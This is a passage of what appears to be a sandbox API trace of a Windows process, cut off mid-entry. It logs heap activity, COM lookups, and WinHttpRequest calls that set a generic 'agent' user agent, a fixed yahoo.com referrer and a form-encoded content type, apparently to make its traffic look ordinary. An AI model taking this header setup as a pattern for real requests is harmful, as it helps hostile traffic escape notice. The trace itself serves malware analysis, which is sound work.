[0243.402] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.402] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x7, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.402] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa036d8 [0243.402] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x8, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.402] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa036d8 [0243.402] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x9, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.402] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa036d8 [0243.403] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0xa, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.403] ITypeInfo:LocalReleaseTypeAttr (This=0x9d414c) returned 0xbfd380 [0243.403] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa036d8 [0243.403] WinHttpRequest:IUnknown:Release (This=0x9d414c) returned 0x1 [0243.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x34) returned 0xc42358 [0243.403] WinHttpRequest:IDispatch:Invoke (in: This=0x8e7738, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x87f468*(rgvarg=([0]=0xc4235c*(varType=0x8, wReserved1=0xf786, wReserved2=0x10d, wReserved3=0x501, varVal1="agent", varVal2=0x0), [1]=0xc4236c*(varType=0x8, wReserved1=0x455, wReserved2=0x1306, wReserved3=0x4902, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f430, puArgErr=0x87f478 | out: pDispParams=0x87f468*(rgvarg=([0]=0xc4235c*(varType=0x8, wReserved1=0xf786, wReserved2=0x10d, wReserved3=0x501, varVal1="agent", varVal2=0x0), [1]=0xc4236c*(varType=0x8, wReserved1=0x455, wReserved2=0x1306, wReserved3=0x4902, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f430*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f478*=0x2b5995) returned 0x0 [0243.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1170 | out: hHeap=0x8a0000) returned 1 [0243.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0243.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0243.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2f88 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc42358 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2568 | out: hHeap=0x8a0000) returned 1 [0243.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d3b8 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25c8 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc1f0 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e868 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2578 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2f88 | out: hHeap=0x8a0000) returned 1 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0243.404] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0243.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2f88 [0243.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0243.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2578 [0243.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0243.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d3b8 [0243.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e868 [0243.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc8e0 [0243.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc1f0 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc9d0 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc988 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25c8 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25c8 | out: hHeap=0x8a0000) returned 1 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e890 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25c8 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25c8 | out: hHeap=0x8a0000) returned 1 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca48 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc1f0 | out: hHeap=0x8a0000) returned 1 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0243.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e868 | out: hHeap=0x8a0000) returned 1 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25c8 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1170 [0243.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x22) returned 0xc33b08 [0243.405] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x8e7738, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f380*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x87f484 | out: rgDispId=0x87f484*=2) returned 0x0 [0243.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc33b08 | out: hHeap=0x8a0000) returned 1 [0243.406] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x8e7738, iTInfo=0x0, lcid=0x800, ppTInfo=0x87f378 | out: ppTInfo=0x87f378*=0x9d414c) returned 0x0 [0243.406] ITypeInfo:RemoteGetTypeAttr (in: This=0x9d414c, ppTypeAttr=0x87f370, pDummy=0x356310 | out: ppTypeAttr=0x87f370, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.406] ITypeInfo:LocalGetIDsOfNames (This=0x9d414c) returned 0x0 [0243.406] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x0, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.406] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.406] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x1, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.406] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa44f48 [0243.406] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x2, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.406] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa44f48 [0243.406] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x3, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.406] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.406] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x4, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.406] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.406] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x5, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.406] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.406] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x6, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.406] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.406] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x7, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.406] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.407] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x8, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.407] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.407] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x9, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.407] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.407] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0xa, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.407] ITypeInfo:LocalReleaseTypeAttr (This=0x9d414c) returned 0xbfd380 [0243.407] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.407] WinHttpRequest:IUnknown:Release (This=0x9d414c) returned 0x1 [0243.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x34) returned 0xc42358 [0243.407] WinHttpRequest:IDispatch:Invoke (in: This=0x8e7738, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x87f468*(rgvarg=([0]=0xc4235c*(varType=0x8, wReserved1=0xf786, wReserved2=0x10d, wReserved3=0x501, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xc4236c*(varType=0x8, wReserved1=0x455, wReserved2=0x1306, wReserved3=0x4902, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f430, puArgErr=0x87f478 | out: pDispParams=0x87f468*(rgvarg=([0]=0xc4235c*(varType=0x8, wReserved1=0xf786, wReserved2=0x10d, wReserved3=0x501, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xc4236c*(varType=0x8, wReserved1=0x455, wReserved2=0x1306, wReserved3=0x4902, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f430*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f478*=0x2b5995) returned 0x0 [0243.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1170 | out: hHeap=0x8a0000) returned 1 [0243.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0243.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc1f0 [0243.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2568 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc42358 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25c8 | out: hHeap=0x8a0000) returned 1 [0243.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d3b8 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2578 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e890 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2f88 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc1f0 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2568 | out: hHeap=0x8a0000) returned 1 [0243.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0243.408] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0243.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2568 [0243.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2f88 [0243.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d3b8 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e890 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc988 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc1f0 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc970 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bca48 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bca18 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2578 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0243.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2578 | out: hHeap=0x8a0000) returned 1 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e868 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2578 [0243.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0243.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2578 | out: hHeap=0x8a0000) returned 1 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0243.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0243.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0243.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc1f0 | out: hHeap=0x8a0000) returned 1 [0243.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0243.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0243.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0243.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0243.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0243.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e890 | out: hHeap=0x8a0000) returned 1 [0243.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0243.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2578 [0243.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1170 [0243.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x22) returned 0xc33b08 [0243.410] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x8e7738, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f380*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x87f484 | out: rgDispId=0x87f484*=2) returned 0x0 [0243.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc33b08 | out: hHeap=0x8a0000) returned 1 [0243.410] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x8e7738, iTInfo=0x0, lcid=0x800, ppTInfo=0x87f378 | out: ppTInfo=0x87f378*=0x9d414c) returned 0x0 [0243.410] ITypeInfo:RemoteGetTypeAttr (in: This=0x9d414c, ppTypeAttr=0x87f370, pDummy=0x356310 | out: ppTypeAttr=0x87f370, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.410] ITypeInfo:LocalGetIDsOfNames (This=0x9d414c) returned 0x0 [0243.410] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x0, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.410] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.410] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x1, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.410] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa44f48 [0243.410] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x2, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.410] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa44f48 [0243.410] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x3, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.410] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.410] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x4, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.410] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.410] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x5, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.410] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.410] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x6, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.411] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.411] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x7, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.411] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.411] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x8, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.411] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.411] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x9, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.411] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.411] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0xa, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.411] ITypeInfo:LocalReleaseTypeAttr (This=0x9d414c) returned 0xbfd380 [0243.411] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.411] WinHttpRequest:IUnknown:Release (This=0x9d414c) returned 0x1 [0243.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x34) returned 0xc42358 [0243.411] WinHttpRequest:IDispatch:Invoke (in: This=0x8e7738, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x87f468*(rgvarg=([0]=0xc4235c*(varType=0x8, wReserved1=0xf786, wReserved2=0x10d, wReserved3=0x501, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xc4236c*(varType=0x8, wReserved1=0x455, wReserved2=0x1306, wReserved3=0x4902, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f430, puArgErr=0x87f478 | out: pDispParams=0x87f468*(rgvarg=([0]=0xc4235c*(varType=0x8, wReserved1=0xf786, wReserved2=0x10d, wReserved3=0x501, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xc4236c*(varType=0x8, wReserved1=0x455, wReserved2=0x1306, wReserved3=0x4902, varVal1="Content-Type", 